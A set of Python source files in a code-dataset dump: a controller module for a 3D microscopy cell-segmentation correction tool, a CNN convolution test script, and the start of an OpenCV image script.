self.selected, self.omitted, ct_weight, grey_labels)\n    \n    @property\n    def stack(self):\n        return self.labelled_stack.labels\n\n    def set_stack(self, s):\n        self.labelled_stack.set_stack(s)\n        self.update_cells()\n        self.update()\n\n    def dilate_labels(self):\n        s = self.stack\n        s = nd.grey_dilation(s, size=(3,3,3))\n        self.set_stack(s)\n        self.update_cells()\n    \n    \n    def get_cell_props(self):\n        return self.labelled_stack.cell_props\n    \n    def calc_mean_signal(self, signal):\n        self.labelled_stack.calc_mean_signal(signal)\n\n    def calc_min_signal(self, signal):\n        self.labelled_stack.calc_min_interior_signal(signal)\n\n    def calc_mean_interior_signal(self, signal):\n        self.labelled_stack.calc_mean_interior_signal(signal)\n\n    def make_borders(self):\n        return self.labelled_stack.make_borders()\n    \n    #TODO\n    \n    def select_by_prop(self, cond):\n        props = self.get_cell_props()\n        percentile_props = {}\n        prop_names = list(props)\n        for p in props:\n            prop = props[p]\n            mean_v = np.mean(props[p].values())\n            percentile_props[p] = dict((i, prop[i]/ mean_v) for i in prop)\n\n        selected = []\n        for i in self.labelled_stack.cell_props[prop_names[0]]:\n            v = eval(cond, {}, dict((p, percentile_props[p][i]) for p in prop_names))\n            if v:\n                selected.append(i)\n        self._set_selected(selected)\n\n\n    def write_celltypes(self, fn):\n        celltypes = self.labelled_stack.celltypes\n        with open(fn, 'w') as csvfile:\n            writer = csv.writer(csvfile)\n            for (i,v) in celltypes.items():\n                writer.writerow((i,v))\n\n    def get_celltypes(self):\n        return self.labelled_stack.celltypes\n    \n    def read_celltypes(self, fn):\n        celltypes = self.labelled_stack.celltypes\n        with open(fn, 'r') as csvfile:\n            reader = csv.reader(csvfile)\n            for row in reader:\n                if len(row)>1:\n                    celltypes[int(row[0])] = int(row[1])\n        self.update()\n\n    \n    def set_celltype(self, ct):\n        for i in self.selected:\n            self.labelled_stack.celltypes[i] = ct\n        self.update()\n\n    \n    def select_small(self, large):\n        labels, counts = np.unique(self.stack, return_counts=True)\n        mean_area = np.mean(counts)\n        self._set_selected(labels[counts<large*mean_area].tolist())\n\n    def select_large(self, small):\n        labels, counts = np.unique(self.stack, return_counts=True)\n        mean_area = np.mean(counts)\n        self._set_selected(labels[counts>small*mean_area].tolist())\n\n    \n    def select_neighbours(self):\n        ls = self.labelled_stack\n        A = ls.get_mean_bdd_connectivity()\n\n        selected = list(set(itertools.chain.from_iterable(A.indices[A.indptr[i]:A.indptr[i+1]] for i in self.selected)) - set(self.selected))\n        if 0 in selected:\n            selected.remove(0)\n\n        self._set_selected(selected)\n\n    \n    def write_cell_graph(self, fn):\n        self.labelled_stack.write_cell_graph(fn)\n\n    \n    def merge_watershed(self, level):\n        return self.labelled_stack.merge_watershed(level)\n\n    \n    def expand_selection(self, threshold):\n        ls = self.labelled_stack\n        A = ls.get_mean_bdd_connectivity()\n        threshold = float(threshold)*np.mean(A.data)\n\n        selected = list(set(itertools.chain(itertools.chain.from_iterable(A.indices[A.indptr[i]:A.indptr[i+1]][A.data[A.indptr[i]:A.indptr[i+1]]<threshold] for i in self.selected), self.selected)))\n        if 0 in selected:\n            selected.remove(0)\n\n        self._set_selected(selected)\n\n    \n    def filter_large(self, large):\n        labels, counts = np.unique(self.stack, return_counts=True)\n        mean_area = np.mean(counts)\n        bad_labels = labels[(counts>large*mean_area)]\n\n        print('bad_labels', bad_labels)\n        self._delete_cells(bad_labels)\n        self.update()\n    \n    def merge_selected(self):\n        selected = sorted(self.selected)\n        if not selected:\n            return\n        min_selected = selected[0]\n        self.stack.flat[np.in1d(self.stack.flat, self.selected)] = min_selected\n        \n        if 'area' in self.labelled_stack.cell_props:\n            new_area = sum(self.labelled_stack.cell_props['area'][i] for i in selected)\n            self.labelled_stack.cell_props['area'][selected[0]] = new_area\n        self._delete_cells(selected[1:])\n        self.selected = [selected[0]]\n        print('up')\n        self.update()\n    \n\n    def _delete_cells(self, cells):\n        # Fix up selection\n        for i in cells:\n            if i in self.labelled_stack.celltypes:\n                del self.labelled_stack.celltypes[i]\n            for p in self.labelled_stack.cell_props.values():\n                if i in p:\n                    del p[i]\n\n        self._set_selected(list(set(self.selected) - set(cells)))\n\n    def select_by_celltype(self, ct):\n        selected = [i for i,v in self.labelled_stack.celltypes.items() if v in ct] \n        self._set_selected(selected)\n    \n    def set_omitted(self, ct_list):\n        self.omitted = ct_list\n        self.update()\n\n    \n    def set_selected(self, selected):\n        self._set_selected(selected)\n\n    def _set_selected(self, selected):\n        self.selected = selected\n        self.update_selected()\n\n\n    \n    def delete_selected(self):\n        self.stack.flat[np.in1d(self.stack.flat, self.selected)] = 0\n        self._delete_cells(self.selected)\n        self.update()\n    \nclass PointMarkerCollectionController(object):\n    def __init__(self):\n        self.points = []\n    \n    def add_points(self, points):\n        self.points += points\n\n    def add_point_label(self, x):\n        self.points.append(x)\n    \n\n    \n    \nclass SignalStackController(StackController):\n\n    def write_tiff(self, fn):\n        write_tiff(fn, self.stack.astype(np.float32), self.spacing)\n\n    def blur_stack(self, radius):\n        self.stack = itk_blur_stack(self.stack, self.spacing, radius)\n        self.update()\n    \n    def apply_power(self, power):\n        self.stack = np.power(self.stack, power)\n        self.update()\n\n    def flip_z(self):\n        self.stack = np.ascontiguousarray(self.stack[::-1,:,:])\n        self.update()\n\n    def equalize_stack(self):\n        self.stack = equalize(self.stack)\n        self.update()\n\n    def invert(self):\n        self.stack = np.max(self.stack) - self.stack\n        self.update()\n\n    def grey_closing(self, radius):\n        self.stack = nd.grey_closing(self.stack, radius)\n\n    def paint(self, p):\n#        self.stack[tuple(p)] = 1.0\n        self.last_paint = tuple(p)[1:]\n        self.update()\n\n    def clahe(self):\n        self.stack[0,:,:] = skimage.exposure.equalize_adapthist(self.stack[0,:,:], 16)\n\n    def aniso(self):\n        signal = sitk.GetImageFromArray(self.stack)\n        signal = sitk.GradientAnisotropicDiffusion(signal)\n        self.stack = sitk.GetArrayFromImage(signal)\n        self.update()\n\n    def subtract_bg(self):\n        self.stack = np.clip(self.stack - nd.gaussian_filter(self.stack, 20), 0, 1)\n        
self.update()\n \n\n def paint_to(self, p):\n rr, cc = line(self.last_paint[0], self.last_paint[1], p[1], p[2])\n self.stack[p[0],rr,cc] = 1.0\n self.last_paint = tuple(p)[1:]\n self.update()\n\n \nclass WorldController(object):\n def __init__(self, log=None, spacing=None, autosave_dir=None):\n self.all_label_controllers = {}\n self.all_signal_controllers = {}\n self.active_signal = None\n self.active_label = None\n self.autosave_dir = autosave_dir\n self.update_callbacks = []\n self.spacing = spacing\n self.log = log\n self.undo_stack = collections.deque([], maxlen=100)\n self.log_stack = []\n self.stack_shape = None\n self.view = None\n\n\n def replay_log(self, filename):\n with open(filename, 'r') as f:\n for l in f:\n print('REPLAY COMMAND :', l)\n func_name, args, kwargs = eval(l, {'array':np.array, 'float32':np.float32})\n try:\n y = getattr(self, func_name)\n \n w = self.wc\n y = getattr(w, func_name)\n except AttributeError:\n pass\n\n y(*args, **kwargs)\n self.update()\n\n \n def undo(self):\n self.log.write('[\"undo\",(),{}]\\n')\n print(self.undo_stack)\n if self.undo_stack and self.undo_stack[-1] != False:\n action = self.undo_stack.pop()\n action()\n\n def repeat(self):\n if self.log_stack:\n action = self.log_stack[-1]\n print('REPEAT', action)\n action()\n\n \n def set_stack_shape(self, shape):\n self.stack_shape = shape\n if self.view:\n self.view.make_stack_obj()\n \n \n def update(self, msg=None):\n for f in self.update_callbacks:\n f(msg)\n\n def update_signal(self, *msg):\n l = self.active_label\n s = self.active_signal\n if l is not None:\n self.get_label_controller().update_signal(self.get_signal_stack)\n\n\n def update_label(self, *msg):\n pass\n \n def get_spacing(self):\n if self.spacing is not None:\n return self.spacing\n else:\n return (1.0, 1.0, 1.0)\n\n \n def get_label_controller(self):\n if self.active_label is not None:\n return self.all_label_controllers[self.active_label]\n else:\n return None\n \n def get_label_stack(self):\n if self.active_label is not None:\n return self.all_label_controllers[self.active_label].stack\n else:\n return np.zeros(self.stack_shape, dtype=np.int32)\n \n\n \n def get_signal_controller(self):\n return self.all_signal_controllers[self.active_signal]\n\n def get_signal_stack(self):\n if self.active_signal is not None:\n return self.all_signal_controllers[self.active_signal].stack\n else:\n return np.zeros(self.stack_shape, dtype=np.float32)\n\n def get_all_signal_stacks(self):\n return [c.stack for c in self.all_signal_controllers.values()]\n\n \n\n @undo_label\n def add_seed(self, v, use_selected=False):\n if self.active_label is None:\n self.make_empty_labels()\n print(self.active_label)\n self.get_label_controller().add_seed(v, use_selected=use_selected)\n \n\n\n @undo_label\n def seed_minima(self, r=2):\n if self.active_label is None:\n self.make_empty_labels()\n signal = self.get_signal_stack()\n labels = self.get_label_stack()\n b_signal = signal #.astype(np.float32)\n b_signal = nd.gaussian_filter(b_signal, r)\n\n nbd = nd.generate_binary_structure(len(b_signal.shape),2)\n minima = (b_signal==nd.minimum_filter(b_signal, footprint=nbd))\n \n minima = nd.binary_dilation(minima, structure=np.ones((3,3,3)))\n m_labels, nl = nd.label(minima)\n print('labels shape', m_labels.shape, nl)\n \"\"\"\n #labels[m_labels>0] = m_labels[m_labels>0]+np.max(labels)\n labels = m_labels\n minima = signal>np.mean(signal)\n \"\"\"\n self.get_label_controller().set_stack(m_labels.astype(np.int32)) \n\n \n def watershed_from_labels(self, 
slice_z=None, mask_celltypes=True):\n celltypes = self.get_label_controller().labelled_stack.celltypes\n \n\n labels = self.get_label_stack()\n print('labels dtype', labels.dtype)\n N = np.max(labels)+1\n signal = self.get_signal_stack()\n if signal.shape[0]>labels.shape[0]:\n signal = signal[slice_z:slice_z+1,:,:]\n\n if mask_celltypes: \n mask_cells = np.array([celltypes.get(i, 0)>0 for i in range(N)])\n mask = mask_cells[labels]\n old_labels = np.array(labels)\n labels[mask] = 0\n signal = np.array(signal)\n signal[mask] = 1\n signal = sitk.GetImageFromArray(signal)\n labels = sitk.GetImageFromArray(labels.astype(np.int32))\n labels = sitk.MorphologicalWatershedFromMarkers(signal, labels, markWatershedLine = False)\n labels = sitk.GetArrayFromImage(labels)\n if mask_celltypes:\n labels = np.where(mask, old_labels, labels)\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n @undo_label\n def resegment(self):\n\n lc = self.get_label_controller()\n labels = np.array(self.get_label_stack())\n selected = lc.get_selected()\n \n N = np.max(labels)+1\n signal = np.array(self.get_signal_stack())\n s_max = np.max(signal)\n\n mask = np.isin(labels, selected)\n mask = nd.binary_fill_holes(mask)\n\n obj = nd.find_objects(mask)\n if not obj:\n return\n sl = obj[0]\n\n labels = labels[sl]\n signal = signal[sl]\n mask = mask[sl]\n \n labels[~mask] = 0\n signal[~mask] = s_max\n for i in selected:\n labels[labels==i] = 0\n \n signal = sitk.GetImageFromArray(signal)\n labels = sitk.GetImageFromArray(labels.astype(np.int32))\n labels = sitk.MorphologicalWatershedFromMarkers(signal, labels, markWatershedLine = False)\n new_labels = sitk.GetArrayFromImage(labels)\n\n labels = self.get_label_stack()\n labels[sl] = np.where(mask, new_labels, labels[sl])\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n @undo_label\n def split_plane(self):\n\n lc = self.get_label_controller()\n labels = np.array(self.get_label_stack())\n selected = lc.get_selected()\n if len(selected)!=1:\n return\n \n N = np.max(labels)+1\n signal = np.array(self.get_signal_stack())\n s_max = np.max(signal)\n\n mask = np.isin(labels, selected)\n mask = nd.binary_fill_holes(mask)\n\n obj = nd.find_objects(mask)\n if not obj:\n return\n sl = obj[0]\n \n labels = labels[sl]\n mask = mask[sl]\n \n labels[~mask] = 0\n\n labels[labels==selected[0]] = 0\n\n cells = np.unique(labels)\n\n cm = nd.center_of_mass(np.ones_like(labels), labels, cells[1:])\n if len(cm)<3:\n return\n\n c_i, c_j, c_k = cm[0]\n\n n_i, n_j, n_k = np.cross(np.array(cm[1])-np.array(cm[0]), np.array(cm[2])-np.array(cm[0]))\n \n s = labels.shape\n i, j, k = np.ogrid[:s[0], :s[1], :s[2]]\n mask2 = ((i-c_i)*n_i + (j-c_j)*n_j + (k-c_k)*n_k >0)*mask\n\n new_labels = mask*selected[0]\n new_labels[mask2] = cells[1]\n\n \n labels = self.get_label_stack()\n labels[sl] = np.where(mask, new_labels, labels[sl])\n self.get_label_controller().set_stack(labels.astype(np.int32))\n\n\n \n\n @undo_label\n def rw_from_labels(self, beta=100):\n signal = self.get_signal_stack()\n labels = self.get_label_stack()\n result = random_walker(signal, labels, beta=beta, mode='cg_mg', use_gradient=False)\n self.get_label_controller().set_stack(result)\n\n @log\n def watershed_no_labels(self, sigma=1.0, h=1.0):\n if self.active_label is None:\n self.make_empty_labels()\n s = self.get_signal_stack()\n signal = sitk.GetImageFromArray(255*(s/float(np.max(s))))\n if sigma>0:\n signal = sitk.DiscreteGaussian(signal, sigma)\n signal = sitk.Cast(signal, sitk.sitkInt16) \n labels 
= sitk.MorphologicalWatershed(signal, level=h, markWatershedLine = False, fullyConnected=False)\n labels = sitk.GetArrayFromImage(labels)\n lc = self.get_label_controller()\n lc.set_stack(labels.astype(np.int32))\n lc.update_cells()\n\n def get_signal_names(self):\n return self.all_signal_controllers.keys()\n\n def get_label_names(self):\n return self.all_label_controllers.keys()\n\n @undo_signal\n def apply_clip_planes_signal(self, clip_planes):\n self.get_signal_controller().apply_clip_planes(clip_planes)\n\n @undo_signal\n def apply_clip_planes_labels(self, clip_planes):\n self.get_label_controller().apply_clip_planes(clip_planes)\n\n\n @undo_label\n def classify_seg(self, other_name):\n self.get_label_controller().classify_seg(self.all_label_controllers[other_name].stack)\n \n @log\n def copy_signal_stack(self):\n stack_name = 'img'+str(len(self.all_signal_controllers)+1)\n\n u = np.array(self.get_signal_stack())\n \n self._add_signal(stack_name, u)\n self._select_active_signal(stack_name)\n\n self.update()\n\n\n @log\n def copy_label_stack(self):\n stack_name = 'label'+str(len(self.all_label_controllers)+1)\n\n u = np.array(self.get_label_stack())\n \n self._add_label(stack_name, u)\n self._select_active_label(stack_name)\n\n self.update()\n\n\n \n @log\n def select_active_signal(self, stack_name):\n self._select_active_signal(stack_name)\n self.update()\n \n def _select_active_signal(self, stack_name):\n self.active_signal = stack_name\n\n\n @log\n def select_active_label(self, label_name):\n self._select_active_label(label_name)\n self.update()\n \n def _select_active_label(self, label_name):\n self.active_label = label_name\n\n \n def _add_signal(self, new_name, new_signal):\n self.all_signal_controllers[new_name] = SignalStackController(new_signal, self.spacing)\n self.all_signal_controllers[new_name].update_callbacks.append(self.update_signal)\n\n def _add_label(self, new_name, new_label, orig_shape=None):\n if self.active_signal is None:\n self.all_label_controllers[new_name] = LabelledStackController(new_label, self.spacing, None, orig_shape=orig_shape, autosave_dir = self.autosave_dir)\n else:\n self.all_label_controllers[new_name] = LabelledStackController(new_label, self.spacing, self.get_signal_stack(), orig_shape=orig_shape, autosave_dir = self.autosave_dir)\n self.all_label_controllers[new_name].update_callbacks.append(self.update_label)\n self.all_label_controllers[new_name].update_callbacks.append(self.update)\n\n\n\n @log\n def load_signal(self, filename, img_dir=False):\n stack_name = 'img'+str(len(self.all_signal_controllers)+1)\n #\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir:\n u, spacing = load_image_dir(filename, 0)\n spacing = np.array(spacing)\n elif 'png' in filename:\n u, spacing = load_png(filename)\n spacing = np.array(spacing)\n else:\n u, spacing = load_tiff(filename, 0)\n spacing = np.array(spacing)\n\n if self.spacing is None:\n self.spacing = spacing\n \n# u = process(u).astype(np.float32)\n u = u.astype(np.float32)\n\n u = (u/np.max(u)).astype(np.float32)\n\n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n \n self._add_signal(stack_name, u)\n self._select_active_signal(stack_name)\n\n self.update()\n\n\n @log\n def load_signal_rgb(self, filename, img_dir=False):\n stack_name = 
'img'+str(len(self.all_signal_controllers)+1)\n #\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir:\n u, spacing = load_image_dir(filename, 0)\n spacing = np.array(spacing)\n elif 'png' in filename:\n u, spacing = load_png_rgb(filename)\n spacing = np.array(spacing)\n else:\n u, spacing = load_tiff(filename, 0)\n spacing = np.array(spacing)\n\n if self.spacing is None:\n self.spacing = spacing\n \n\n# u = process(u).astype(np.float32)\n\n for i in range(u.shape[0]):\n v = u[i,:,:,:].astype(np.float32)\n\n v = (v/np.max(v)).astype(np.float32)\n\n if self.stack_shape is None:\n self.set_stack_shape(v.shape)\n self._add_signal(stack_name+'-'+['r','g','b'][i], v)\n \n self._select_active_signal(stack_name+'-r')\n\n self.update()\n \n\n @log\n def make_empty_labels(self, label_name=None):\n if label_name is None:\n label_name = 'label'+str(len(self.all_label_controllers)+1)\n #\n\n u = self.get_label_stack()\n\n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n self._add_label(label_name, u, orig_shape = u.shape)\n self._select_active_label(label_name)\n self.update()\n\n\n \n @log\n def load_label(self, filename, img_dir=False, label_name=None, remap=False):\n if label_name is None:\n label_name = 'label'+str(len(self.all_label_controllers)+1)\n #\n\n def round_up(i, c):\n return i + (c-i%c)%c\n\n def process(s):\n s = np.abs(s)\n ext_shape = tuple( [ round_up(i, 16) for i in s.shape ])\n tmp = np.zeros(ext_shape, dtype = s.dtype)\n tmp[:s.shape[0], :s.shape[1], :s.shape[2]] = s\n return tmp\n\n if img_dir or '%' in filename:\n u, spacing = load_image_dir_labels(filename, 0)\n remap=True\n elif 'png' in filename:\n u, spacing = load_png_labels(filename)\n remap = True\n else:\n u, spacing = load_tiff(filename, 0)\n\n\n\n if len(u.shape)==4:\n u = 256*256*u[:,:,:,0]+256*u[:,:,:,1] + u[:,:,:,2] # RGB labelled images\n\n \n orig_shape = u.shape\n\n if u.dtype==np.int32:\n u=u.astype(np.uint32)\n \n # REMAP\n\n shape = u.shape\n if remap:\n l, u = np.unique(u, return_inverse=True)\n u = u.reshape(shape)\n\n spacing = np.array(spacing)\n if self.spacing is None:\n self.spacing = spacing\n \n# u = process(u)\n \n if self.stack_shape is None:\n self.set_stack_shape(u.shape)\n\n self._add_label(label_name, u, orig_shape = orig_shape)\n self._select_active_label(label_name)\n\n\n self.update()\n\n \n\n \n @undo_label\n def delete_selected(self):\n self.get_label_controller().delete_selected()\n\n\n @undo_no_log\n def write_label_tiff(self, fn):\n self.get_label_controller().write_tiff(fn)\n\n @undo_no_log\n def write_celltypes(self, fn):\n self.get_label_controller().write_celltypes(fn)\n\n\n @undo_label\n def read_celltypes(self, fn):\n self.get_label_controller().read_celltypes(fn)\n self.update()\n \n @undo_no_log\n def write_signal_tiff(self, fn):\n self.get_signal_controller().write_tiff(fn)\n\n @undo_no_log\n def write_mask_tiff(self, fn):\n self.get_mask_controller().write_tiff(fn)\n\n\n\n def get_selected(self):\n c = self.get_label_controller()\n if c:\n return c.get_selected()\n else:\n return []\n\n\n def get_celltypes(self):\n c = self.get_label_controller()\n if c:\n return c.get_celltypes()\n else:\n return {}\n \n def gen_colmap(self, prop_name=None, celltypes=False, omitted=[], ct_weight=0.6, grey_labels=False):\n lc = self.get_label_controller()\n if lc:\n 
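# delegate colour-map construction to the active label controller; fall back to a zero map when no labels are loaded\n            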
return lc.gen_colmap(prop_name, celltypes, omitted, ct_weight, grey_labels)\n        else:\n            return np.zeros((256,3), dtype=np.float32)\n\n    \n\n    def gen_volume_colmap(self):\n        lc = self.get_label_controller()\n#        print 'gen_volume_colmap', lc\n        if lc:\n#            print '>', lc.gen_colmap(celltypes=True, ct_weight=0.0, grey_labels=False)\n#            print '>>'\n            return lc.gen_colmap(celltypes=True, ct_weight=0.0, grey_labels=False)\n        else:\n            return np.zeros((256,3), dtype=np.float32)\n\n    \n    def get_cell_props(self):\n        return self.get_label_controller().get_cell_props()\n\n    \n    @undo_selected\n    def select_by_prop(self, cond):\n        self.get_label_controller().select_by_prop(cond)\n        self.update()\n\n    \n    @undo_label\n    def set_celltype(self, ct):\n        self.get_label_controller().set_celltype(ct)\n    \n    @undo_selected\n    def select_small(self, large):\n        old_selected = self.get_label_controller().get_selected()\n        def undo():\n            self.get_label_controller().set_selected(old_selected)\n\n        self.get_label_controller().select_large(large)\n\n    \n    @undo_selected\n    def select_neighbours(self):\n        old_selected = self.get_label_controller().get_selected()\n        def undo():\n            self.get_label_controller().set_selected(old_selected)\n\n        self.get_label_controller().select_neighbours()\n\n    \n    @undo_no_log\n    def write_cell_graph(self, fn):\n        self.get_label_controller().write_cell_graph(fn)\n    \n    @log\n    def merge_watershed(self, level, new_name=None):\n        \n        if new_name is None:\n            new_name = 'merge-'+str(len(self.all_label_controllers)+1)\n\n        new_label = self.get_label_controller().merge_watershed(level)\n        self._add_label(new_name, new_label)\n        self._select_active_label(new_name)\n\n        self.update()\n    \n    @log\n    def make_borders(self):\n        new_name = 'borders'+self.active_label\n        borders = self.get_label_controller().make_borders()\n        self._add_signal(new_name, borders)\n        self._select_active_signal(new_name)\n        self.update()\n\n    @undo_selected\n    def expand_selection(self, threshold):\n        self.get_label_controller().expand_selection(threshold)\n\n    \n    @undo_selected\n    def select(self, v):\n        self.get_label_controller().select(v)\n\n    \n    @undo_selected\n    def add_selected(self, v):\n        self.get_label_controller().add_selected(v)\n        #self.update('selected')\n\n    @undo_selected\n    def include_selected(self, v):\n        s = self.get_label_controller().include_selected(v)\n        if s:\n            return True\n        return False\n    \n    @undo_label\n    def split_cc(self):\n        self.get_label_controller().split_cc()\n\n    @undo_label\n    def merge_selected(self):\n        self.get_label_controller().merge_selected()\n    \n    \n    @undo_label\n    def delete_selected(self):\n        self.get_label_controller().delete_selected()\n    \n    @undo_label\n    def remove_small_large_cells(self, small, large):\n        self.get_label_controller().remove_small_large_cells(small, large)\n    \n    @undo_selected\n    def select_by_celltype(self, ct):\n        self.get_label_controller().select_by_celltype(ct)\n\n\n    @undo_label\n    def split_cell(self):\n        selected = self.get_label_controller().get_selected()\n        self.get_label_controller().split_cell(self.get_signal_stack(), selected[0])\n\n\n    @undo_label\n    def dilate_labels(self):\n        self.get_label_controller().dilate_labels()\n    \n    @undo_label\n    def set_omitted(self, ct_list):\n        self.get_label_controller().set_omitted(ct_list)\n    \n    @undo_selected\n    def set_selected(self, selected):\n        self.get_label_controller().set_selected(selected)\n        #self.update('selected')\n    \n    \n    \n    @undo_signal\n    def blur_stack(self, radius):\n        self.get_signal_controller().blur_stack(radius)\n\n    @undo_signal\n    def grey_closing(self, radius):\n        
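# morphological grey closing (window set by radius) fills dark gaps in the active signal stack\n        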
self.get_signal_controller().grey_closing(radius)\n        \n\n    @undo_signal\n    def subtract_bg(self):\n        self.get_signal_controller().subtract_bg()\n\n    @undo_signal\n    def aniso(self):\n        self.get_signal_controller().aniso()\n\n    @undo_signal\n    def clahe(self):\n        self.get_signal_controller().clahe()\n\n\n    @undo_signal\n    def invert_signal(self):\n        self.get_signal_controller().invert()\n        \n\n    @undo_signal\n    def paint(self, p):\n        self.get_signal_controller().paint(p)\n\n    @undo_signal\n    def paint_to(self, p):\n        self.get_signal_controller().paint_to(p)\n\n    @undo_signal\n    def apply_power(self, power):\n        self.get_signal_controller().apply_power(power)\n\n    @undo_log\n    def flip_z(self):\n        def undo():\n            self.get_signal_controller().flip_z()\n        \n        self.get_signal_controller().flip_z()\n        return undo, None\n    \n    @undo_signal\n    def equalize_stack(self):\n        self.get_signal_controller().equalize_stack()\n    \n    @undo_label\n    def calc_mean_signal(self):\n        self.get_label_controller().calc_mean_signal(self.get_signal_stack())\n    \n    @undo_label\n    def calc_min_signal(self):\n        self.get_label_controller().calc_min_interior_signal(self.get_signal_stack())\n    \n    @undo_label\n    def calc_mean_interior_signal(self):\n        self.get_label_controller().calc_mean_interior_signal(self.get_signal_stack())\n    \n    def get_label_point(self, p):\n        return self.get_label_controller().get_label_point(p)\n\n    \n\n\n\n\n\n\n\n\n\n    \n\n\n\n","repo_name":"jfozard/segcorrect","sub_path":"src/mini_controller_nogl.py","file_name":"mini_controller_nogl.py","file_ext":"py","file_size_in_byte":40690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25682621172","text":"import convolutional_neural_network as cnn\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\n\r\nimg_letter = cv2.imread(\"C:\\\\Users\\\\Christoph Feldkirchn\\\\OneDrive - McKinsey & Company\\\\Desktop\\\\Programming\\\\Neural Networks\\\\cnn\\\\679-6796443_letter-t-png-normal-letter-t-transparent.png\")\r\nimg_pan = cv2.imread(\"C:\\\\Users\\\\Christoph Feldkirchn\\\\OneDrive - McKinsey & Company\\\\Desktop\\\\Programming\\\\Neural Networks\\\\cnn\\\\istockphoto-1145618475-612x612.jpg\")\r\n\r\n# loads it in BGR instead of RGB\r\n#img_letter = cv2.cvtColor(img_letter, cv2.COLOR_BGR2RGB)\r\n#img_pan = cv2.cvtColor(img_pan, cv2.COLOR_BGR2RGB)\r\n#convert image to RGB\r\n\r\n#cv2.imshow('something', img[:,:,0])\r\n#cv2.waitKey(0)\r\n\r\nmodel = cnn.Model()\r\n\r\ndef test_convolve2D(data, kernel, stride, padding):\r\n    img = data\r\n    temp2 = []\r\n    convolved_output = []\r\n    kernel_size = kernel.shape\r\n\r\n    output_shape = cnn.Layer.calc_output_size_padMode(img.shape, np.array(kernel_size), np.array(stride), padding)\r\n\r\n    if padding == 'full':\r\n        img = cnn.Layer.addPadding(data, kernel_size, stride)\r\n\r\n    temp4 = []\r\n    for z in range(len(img.shape)):\r\n        temp2 = img[:,:,z]\r\n        temp3 = []\r\n\r\n        for i in np.arange(temp2.shape[0], step=stride[0]):\r\n            for j in np.arange(temp2.shape[1], step=stride[1]):\r\n                temp = temp2[i:i+kernel_size[0], j:j+kernel_size[1]] \r\n                if temp.shape == tuple(kernel_size):\r\n                    temp3.append((temp*kernel).sum())\r\n\r\n        temp4.append(np.array(temp3).reshape(output_shape))\r\n\r\n    convolved_output = np.dstack(temp4)\r\n\r\n    return convolved_output\r\n\r\n#Padding = Layer()\r\n#data = Padding.addPadding(img_pan, [20,16], [10,8])\r\n\r\n#poolingLayer = MaxPoolingLayer2D([1,1], [2,1], keepDims = True, stride_padding = [100,100], kernel_size = [50,26])\r\n#poolingLayer = MaxPoolingLayer2D([10,18], 
[2,2])\r\n#new_data = poolingLayer.maxPooling2d(img_pan)\r\n\r\nkernel_random = np.random.randint(2, size=(50,50))/255 #random kernel\r\nkernel_random = kernel_random / np.sum(kernel_random)\r\nkernel_edge = np.array([[-1,-1,-1],[-1,8,-1],[-1,-1,-1]]) #edge detection kernel\r\nkernel_identity = np.array([[0, 0, 0],[0, 1, 0],[0, 0, 0]]) #identity kernel\r\nkernel_sharpening = np.array([[0, -1, 0],[-1, 5, -1],[0, -1, 0]]) #sharpening kernel\r\nkernel_gaussian_blur = (1/16)*np.array([[1, 2, 1],[2, 4, 2],[1, 2, 1]])\r\n\r\n#conv = ConvLayer2D(2, 3, 'valid', 1, name='Something')\r\n\r\n#data = conv.forward(img_pan, True)\r\n\r\n#conv2dLayer = ConvLayer2D(1, kernel.shape, 'valid', 2, 'reLU')\r\n#conv_data = conv2dLayer.convolve2D(img_letter[:,:,0], kernel)\r\n#conv_data2 = conv2dLayer.convolve2D(img_pan[:,:,0], kernel)\r\n\r\nmodel.add(cnn.ConvLayer2D(1, kernel_edge, 'valid', 1, name='Something'))\r\n#model.add(cnn.ReLU_activation())\r\nmodel.add(cnn.ConvLayer2D(1, kernel_identity, 'valid', 1, name='Something'))\r\n \r\n#model.add(cnn.ReLU_activation())\r\n#model.add(MaxPoolingLayer2D([1,1], [2,2], keepDims = False, stride_padding = [100,100], kernel_size = [50,26]))\r\n\r\n#conv_data = model.layers['ConvLayer2D-Something-0'].convolve2D(img_letter, kernel_identity)\r\n#conv_data2 = model.layers['ConvLayer2D-Something-0'].convolve2D(img_pan, kernel_identity)\r\n\r\n#cv2.imshow('something', new_data)\r\n\r\n#cv2.imshow('original_letter', img_letter)\r\n#cv2.imshow('conv_letter', conv_data)\r\n\r\n#cv2.imshow('original_panorama', img_pan)\r\n#cv2.imshow('conv_panorama', conv_data2)\r\n\r\nstart = time.time()\r\ndata = model.forward(img_pan)\r\nend = time.time()\r\n\r\nprint(end - start)\r\n\r\ncv2.imshow('original_panorama', img_pan)\r\nfor i in range(data.shape[0]):\r\n cv2.imshow(f'conv - {i}', data[i])\r\n\r\ncv2.waitKey(0)","repo_name":"chrisfeldkircher/tumor-detection-cnn","sub_path":"cnn/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24172560076","text":"import numpy as np\nimport cv2\n# print(dir(cv2))\nimport matplotlib.pyplot as plt # http://matplotlib.org/api/pyplot_api.html\n\nfpath = u'D:/1111.png'\n# fpath = r\"D:\\PeaceShi\\OneDrive\\Pictures\\HD Pic\\1486472251_atelier-sophie_waifu2x_art_noise0_scale_tta_1.png\"\n# print(os.path.dirname(fpath).join(fpath.split()))\n\nimg = cv2.imread(fpath) # Color image loaded by Opencv2 is in BGR mode.\nimg2 = img.copy()\n\"\"\"# create one window\nwin_name = \"test\"\ncv2.namedWindow(win_name)\nwin2_name = \"test2\"\ncv2.namedWindow(win2_name)\n\"\"\"\n# take off one template\n# rect = (170, 80, 50, 50)\n# cv2.setimageroi(image, rect)\n# 